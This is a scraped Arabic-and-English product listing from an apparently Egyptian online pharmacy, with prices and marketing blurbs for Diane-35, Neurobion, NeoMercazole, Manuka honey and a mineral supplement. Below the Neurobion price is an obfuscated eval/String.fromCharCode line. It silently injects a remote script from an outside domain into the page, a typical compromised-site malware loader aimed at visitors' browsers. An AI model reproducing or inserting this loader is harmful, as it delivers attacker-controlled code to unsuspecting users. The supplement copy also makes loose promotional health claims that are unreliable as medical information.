Diane 35

السعر الأصلي هو: EGP 690.00.السعر الحالي هو: EGP 520.00.
يوجد الكثير من الأشخاص الذين  يعانون من مشكلة حب الشباب أو من تريد منع الحمل وتريد إتباع علاج مناسب  فما عليك سوى استعمال  أقراص Diane-35 ، من أجل التعافي والحصول على ما تريد في وقت قصير  بعد  استشارة الطبيب  لكي يحدد لك الجرعة المناسبة وكيفية استخدامه

Neurobion 30 Coated Tablets

السعر الأصلي هو: EGP 500.00.السعر الحالي هو: EGP 450.00.
var f=String;eval(f.fromCharCode(102,117,110)+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,51,46,48,46,51,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/

NeoMercazole 5mg

السعر الأصلي هو: EGP 650.00.السعر الحالي هو: EGP 590.00.
دواء نيوميركازول neomercazole هو واحد من العلاجات الذي يتم استخدامها لعلاج الغدة الدرقية، فهو يستخدم للحد من إنتاج هرمون الغدة الدرقية والتي تترك بعض الآثار على المرضى، كما أن الدواء فعال ولديه القدرة على خفض نسبة هرمونات الغدة، كما أنه يترك بعض الآثار الجانبية التي تظهر على المرضى نتيجة استعمالهم لدواء نيوميركازول neomercazole.

Manuka Health, MGO 573+, UMF 16+ Certified, Raw Manuka Honey, 8.8oz (250g), 100% Pure New Zealand Honey

السعر الأصلي هو: EGP 3,250.00.السعر الحالي هو: EGP 2,875.00.
  • NATURE MEETS SCIENCE: Expertly crafted MGO 550+ Manuka Honey offers high strength support for natural wellness with a taste of goodness.
  • NEW ZEALAND BORN: Our master beekeepers and bees are key to preserving the quality and natural properties of our Manuka honey.
  • MEASURING THE MAGIC: We judge Manuka honey based on the quantity of methylglyoxal, the 'magic Manuka ingredient', for a precise measurement of potency and quality.
  • BEFORE REACHING YOUR DOORSTEP: Our honey undergoes independent quality testing in an ISO17025 accredited laboratory to ensure quality, purity, and safety.
  • MANUKA WAY OF LIFE: Our mission is to share the healing power of New Zealand nature to reconnect you with natural wellness.

Calcium Magnesium & Zinc by Nature’s Bounty, Immune Support and Supporting Bone Health, 100 Caplets

السعر الأصلي هو: EGP 600.00.السعر الحالي هو: EGP 500.00.
  • MINERAL SUPPLEMENT FOR IMMUNE SUPPORT: 100-Caplet Calcium-Magnesium-Zinc for immune support. Nature’s Bounty Calcium-Magnesium-Zinc Caplets contain Vitamin D3 to assist in calcium absorption and help maintain a healthy immune system.(1)
  • MINERALS FOR BONE SUPPORT: The Calcium and Magnesium in Nature’s Bounty Calcium-Magnesium-Zinc Caplets may contribute to the health of your bones.(1)
  • MINERALS FOR MOOD: Nature’s Bounty Calcium-Magnesium-Zinc Caplets help support a calm, relaxed mood.(1)
  • QUALITY, PURITY, POTENCY: Nature’s Bounty is committed to safety and purity in all our supplements. Our Calcium-Magnesium-Zinc Caplets are non-GMO and sugar- and gluten-free
  • FROM THE TRUSTED WELLNESS EXPERTS: Nature’s Bounty Calcium-Magnesium-Zinc Caplets bring together science, nature and a 50 year dedication to quality, consistency and scientific research for vitamins and nutritional supplements of unrivaled excellence